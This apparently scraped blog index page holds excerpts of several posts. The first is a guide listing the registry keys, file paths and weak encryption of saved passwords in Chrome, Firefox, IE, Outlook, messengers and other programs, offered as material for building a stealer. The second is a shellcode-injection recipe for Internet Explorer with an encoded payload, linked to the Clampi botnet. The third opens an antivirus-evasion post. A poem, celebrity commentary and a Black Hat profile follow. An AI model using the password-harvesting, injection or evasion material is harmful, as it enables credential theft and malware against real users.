All Saved Password Locations.

Google Chrome:
Chrome Passwords are stored in a SQLite file the sites name and sites username is in clear text but the password is seeded in a Triple DES algorithm. The file is called Web Data and is stored in the following location
XP – C:\Documents and Settings\Username\Local Settings\Application Data\Google\Chrome\User Data\Default
Vista – C:\Users\Username\Appdata\Local\Google\Chrome\User Data\Default
Trillian:
Note- I have just realised the new version of trillian the passwords made be stored/encrypted differently
Trillian Passwords are stored in .ini files the first character of the password is encrypted with XOR with the key 243 then the password is converted into hex. The file is based on what the password is for so if it was icq it would be icq.ini (for new versions I think they are all stored in a file called accounts.ini or something similar if you open it up with notepad you will see all the data + the encrypted password). The files are stored in the following location:
XP (old version) – C:\Program Files\Trillian\users\
XP (new version) – C:\Documents and Settings\Username\Local Settings\Application Data\Trillian\user\global – I am not sure on exact but it is somewhere their
Vista (old version)- C:\Program Files\Trillian\users\
Vista (new version)- C:\Users\Username\Appdata\Roaming\Trillian\user\gl obal
MSN /Windows Live Messenger:
MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\C reds\[Account Name]
Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with entry name begins with "WindowsLive:name=". They a set of Win API functions (Credential API's) to store its' security data (Credentials). These functions store user information, such as names and passwords for the accounts (Windows Live ID credentials). Windows Live ID Credential records are controlled by the operating system for each user and for each session. They are attached to the "target name" and "type". If you are familiar with SQL you can think of target name and type as the primary key. Table below lists most frequently used fields in Windows Live ID Credential records.
Paltalk:
Paltalk Passwords are using the same password encryption algorithm. Paltalk passwords are stored in the registry. To encrypt the new password Paltalk looks at the serial number of the disk C:\ and performs a mix with the Nickname. The resulting string is then mixed again with the password and some other constants. The final string is then encoded and written to the registry.
AIM, ICQ and Yahoo Messenger passwords that are stored by Paltalk are encoded by BASE64 algorithm.
The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name]
Google Talk:
Google Talk passwords are encoded/decoded using Crypto API. Encrypted Gmail passwords are stored by Google Talk in the registry under HKEY_CURRENT_USER\Software\Google\Google
Talk\Accounts\[Account Name]
Firefox:
Click Me!!!!
The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)
These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.
Yahoo Messenger 6.x:
The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager
(”EOptions string” value)
Yahoo Messenger 7.5 or later:
The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager – “ETS” value.
The value stored in “ETS” value cannot be recovered back to the original password.
AIM:
AIM uses Blowfish and base64 algorithms to encrypt the AIM passwords.
448-bit keyword is used to encrypt the password with Blowfish. The encrypted string is then encoded using base64. The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords
No Ip (easy to make in vb.net):
Passwords encoded with Base64 you can find the account information in the following locations
HKEY_LOCAL_MACHINESOFTWARE\Vitalwerks\DUC\", "Password"
HKEY_LOCAL_MACHINESOFTWARE\Vitalwerk\sDUC\", "Checked"
HKEY_LOCAL_MACHINESOFTWARE\Vitalwerks\DUC\", "Username
KEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC\", "ProxyUsername
HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC\", "ProxyPassword"
HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC\", "Hosts"
Filezilla:
Passwords are stored in a .xml file located in Filezilla on appdata their is sources for this
Internet Explorer 4.00 – 6.00:
The passwords are stored in a secret location in the Registry known as the “Protected Storage”.
The base key of the Protected Storage is located under the following key:
“HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”.
You can browse the above key in the Registry Editor (RegEdit), but you won’t be able to watch the passwords, because they are encrypted.
Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.
Internet Explorer 7.00 – 8.00:
The new versions of Internet Explorer stores the passwords in 2 different locations.
AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.
HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords.
Opera:
The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile
Outlook Express (All Versions):
The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.
Outlook 98/2000:
Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.
Outlook 2002-2008:
All new versions of Outlook store the passwords in the same Registry key of the account settings.
The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index]
If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.
ThunderBird:
The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]
You should search a filename with .s extension.
Digsby:
The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat
All other passwords are stored in Digsby servers.
Well thats all the one's i no of, if you have any feel free to post them

[……]

[阅读全部]

Using shellcode to inject CODE into the Internet Explorer

Create a Internet Explorer process
in “Suspended Mode” with no visible window
Inject shellcode with the commandline:

Code:

C:\\Program Files\\Internet Explorer\\iexplore.exe
\xFC\xEB\x1A^\x8B\xFEW\xAC<Zt\x0F,A\xC0\xE0\x04\x8A\xD8\xAC,A\x02\xC3\xAA\xEB\xECX\xC
3\xE8\xE1\xFF\xFF\xFFILOMOIAJAAAAAAJAJAJAJAJAJAJAJAJAFOAPDBLJAIAAAAAAILNAF
GIKMCCEAPAEEBIIAGEGMBOKAEOCPCMGAGAAFOILHNAEIDMHBFDDMAFGFHFAGKAEFAG
KPPLIFMJEIAHMPPNAILNIIFMAHFBALIDBADJBHMPPNADNLHAAAAAAHELJOLEODDMAFHFA
FAGIBPAAAPAAFDLIAFLJIAHMPPNAIFMAHEDALJAJAAAAAAIJAEAIIJFMAIAEOIBEAAAAAAIL
OMILHFAEILFOANPPHGAJLIHELJIAHMPPNAOLALIPEEAIAIILPIPMPDKEOLAKFDLIEHJLIAHMP
PNADDMAILOFMDZ\0

Use the CreateRemoteThread API to create a remote thread

at memory location 0x7C812F1D …

This is is where the kernel function GetCommandLineA

has been mapped into Internet Explorer’s memory …

Return a pointer with the GetCommandLineA to the "shell" string

to pass as a parameter to the current process …

Use Api CreateRemoteThread at memory address 0x004A23DC ….

Call ReadProcessMemory ….

Use MapViewofFileExe on the object …

Once again call CreateRemoteThread to execute the injected code !

This method is used by the Clampi Botnet

Thx to the Researches …

Browse to em to get more infos !

[……]

[阅读全部]

浅谈360主动防御(360提示)、瑞星主动及360实时查杀的免杀技

现在的360很变态,一方面联合360杀毒,360安全卫士,后台收集数据进行联合防御策略

根据我的研究,360实时监视你的电脑,如果你的某个文件操作不符合系统规范时,比如

后台安装服务,插入进程,COPY文件到系统目录,他就将父文件等全部后台上传,进入360

服务器后,进行MD5定位,这时,如果有如果有其他电脑同MD5文件进行操作时,在360安

[……]

[阅读全部]

One Year Later

如果想念是最奢侈的
    那我们每天挥霍很多
    思海里漂泊。。。
  
""

 
如果想念是可以控制的
    那么月亮和太阳就能拥抱
    黑百颠倒着.
  
""

 
如果想念是要求回报的
    那么再多的金银也如粪土
    眼睛看不见………
  
""
 

 
如果想念是可笑的
    舞台的小丑他的泪是真的
    演出继续着
  
""

 
如果想念是不理智的
    天空中的飞鸟总有栖落的一天
    头仰望着
  
""
 

 
如果想念是苦涩的
    那请往咖啡里加点那种甜
    悄悄品尝着
  
""
 

 
如果想念是单调的
    听命运交响曲时感觉不到震撼
    命运编织着
  
""
 

 
如果想念是人为的
    那可以把刻意悬挂在梦镜之外
    早晨的第一丝亮
  
""
 

 
如果想念是挂单的
    那种叫鸳的鸟找不到鸯为伴
    一半找一半
  
""
 

  
如果想念是可以创意的
    我想设计一个完美的陷阱
    自己陷入………..
  
""

 

[……]

[阅读全部]

纵观郭德纲弟子打人事件

这些日子,各大媒体娱乐头条争先报道此事件,看了许多,发表下自己的评论。

纵观打人事件,媒体似乎一边倒的支持北京台,连央视都不甘寂寞的请某主持人发表了一篇令人作呕的评论,善哉善哉,这事儿弄到这么大,你们的功劳真是不小。

这几天每日都关注这件事,发现了一个特点,一篇专题出来后,一般都有个调查板块,网友们纷纷点击,开始的时候一直是郭德纲的支持率高,但别等过了24点,只要过了这个时间,似乎某些个龌龊的操纵者就还阳了,记者方点击率猛升,真让我佩服,您需要不需要工具?我提供定制呢!价格好说,您让我打一顿就行了。

公布的打人视频,我看了之后更是感叹,你们的剪切技术合适才能再提高一些啊?不觉得太生硬了吗?是不是用了某些个“剪切秀”之类的傻瓜工具了?也好,和你们挺配套的。

引用郭德纲的话:“偷拍不挨打,此事古难全”,您偷拍也就罢了,怎么还拍的那么理直气壮呢?您理直气壮也就罢了,干嘛还把您辛苦拍好的东西剪掉了关键部分呢?您剪了也就罢了,干嘛还歪曲事实真相呢?做人做到这份上,也够辛苦的,下次出门小心点,别让雷劈了,孔子曰:“记者不是装的,孙子才是装的!”

[……]

[阅读全部]

范渊—-第一个登上全球顶级安全大会BLACKHAT(黑帽子)大会进行演讲的中国人

范渊 ,毕业于美国加州州立大学,计算机科学硕士,拥有十多年在国际著名安全公司的技术研发和项目管理经验,对在线安全、数据库安全和审计、Compliance(如SOX、PCI、ISO17799/27001)有极其深刻的研究。由于在信息安全领域的技术创新的成功实践,成为第一个登上全球顶级安全大会BLACKHAT(黑帽子)大会进行演讲的中国人。

上周五,在美国拉斯维加举行的“黑帽子”大会正式结束,范渊从会场出来,匆忙赶飞机去他的母校加州州立大学,他要拜会几位老朋友,一起聊聊黑客话题。2003年,范渊首次获邀参加世界黑客的顶级盛会“黑帽子”大会,他见到了曾经的偶像,“黑帽子”大会的创立者杰夫•莫斯。后来,他们成了朋友。2005年,范渊获邀在当年的黑帽子大会上作演讲,和全世界的黑客分享他对于网络安全的理解。

将公司总部设在休闲之都杭州的范渊却没有太多时间享受这个城市的安逸,他总是在路上,或者在网上,和那些利令智昏的黑客过招。他总是说,自己其实是个白客。

史上规模最大的黑客聚会

7月28日至8月1日,两大黑客盛事——“黑帽子”大会和“黑客大会”,在美国拉斯维加斯先后举行。前者已成为专业人士交流与黑客攻击相关研究成果的平台,后者更像是各路黑客展示“绝技”的比武盛会。

与“黑客大会”相比,“黑帽子”大会显得较为正式,议程表上排满了专业人士的发言。议题包括针对银行等机构的黑客行为。

据了解,“黑帽子”大会参加者来自企业、政府和学术界等各个领域。范渊告诉记者,两大盛会的创始者、老牌黑客莫斯说:“今年将继续关注网络运作方式和如何对它发起攻击。”同时,今年很多黑客不约而同地将关注的焦点放在了对于手机的攻击上。

范渊说,和以前的几次“黑帽子”大会相比,今年的大会主要有两个区别,一是规模非常大,到会的黑客有2000多人,堪称史上规模最大的黑客聚会。这些黑客来自全世界不同的国家,有着各自不同的职业和兴趣,但是他们都有同样的一个身份——黑客,无论是兼职还是专业。“不过,来自中国的黑客还是非常少,几乎都是老面孔。”

此外,范渊注意到,今年的“黑帽子”大会首次开辟出一个展示对黑客攻击解决方案的分会场。他说,如果说以前的黑客聚会主要以炫耀技术为主,那么今年大家已经开始在关注解决方案。在他看来,这是说明黑客文化和商业之间的一种妥协,或者说平衡。 而且,黑客本身也在向着某个方向不断的进化发展。

黑客在不断进化

正如著名的安全顾问布鲁斯•施尼尔说的:“安全不是一件产品,它是一个过程。“在范渊看来,黑客,也是一个不断进化的过程。

他喜欢用头号黑客凯文•米特尼克的话来区分黑客的不同阶段:早年,一些黑客毁坏别人的文件甚至整个硬盘,他们被称为电脑狂人(crackers)。此后,黑客软件发达,很多新手黑客省去学习技术的麻烦,直接下载黑客工具侵入别人的计算机,这些人被称为脚本小子(script kiddies),也被圈子里的人称为傻瓜黑客。实际上,真正有经验和编程技巧的黑客,则喜欢开发程序,或者去拓展更宽广的应用空间。

实际上,真正的黑客是孤独的。在上世纪80年代,心理调查发现黑客多是一些努力避免人际交往的失败者。但是这一情况因为商业的介入慢慢在发生变化。

对于黑客的未来,范渊说,其实黑客不外乎3条路:坚守、出走或者招安。

坚守的黑客一般默默无闻,他们是最初黑客的铁杆拥护者,他们仿佛是这个网络的幽灵,在几乎所有的服务器之间闲庭信步,寻找他们感兴趣的信息,同时,他们反感黑客的商业化趋势。出走的黑客则顺应潮流,为了有巨大商业价值的信息进行攻防之战。当然,也有不少转向其他领域。而被招安的黑客则一般选择了大的网络公司或者政府。就像黑客大会组织者莫斯,在去年他也加入了美国国土安全顾问委员会。之前被禁止接触键盘和手机的凯文•米特尼克也已经被请出山。

不过,范渊说,与此同时,有些高段位黑客向研究工作发展,为社会作出越来越多的贡献,他们会做些类似基础研究的工作。

和黑客过招的白客

范渊说,真正的黑客不会休假。所以有人说,按照这个标准,比尔•盖茨已经不算是真正的黑客了。盖茨也承认了这一点,他说自己在13到16岁时才算得上真正的黑客。

因为黑客很忙,所以要和黑客过招的范渊也很忙,而他喜欢称乎自己为“白客“。

在他看来,黑白之分不仅是不同的道路,也是不同的理念。他现在已经不太在网上和入侵网络或者喜欢种木马赚钱的黑客直接过招,他正在试图寻找更加简单快捷的方案保护数据,然后追踪那些黑客的脚印,将他们锁定。

“站在不同的技术起点和时代,黑客面临的诱惑也不同。最早的黑客吹口哨盗打电话,后来的黑客用银行漏洞直接划钱,现在的黑客偷盗价值无法估量的机密文件。2009年,赛门铁克调查企业中,43%的企业是由于黑客入侵丢失专利信息。”范渊说,“当黑客用手中的技术越过道德底线寻求不正当利益的时候,他本身就在背叛黑客的精神。”

[……]

[阅读全部]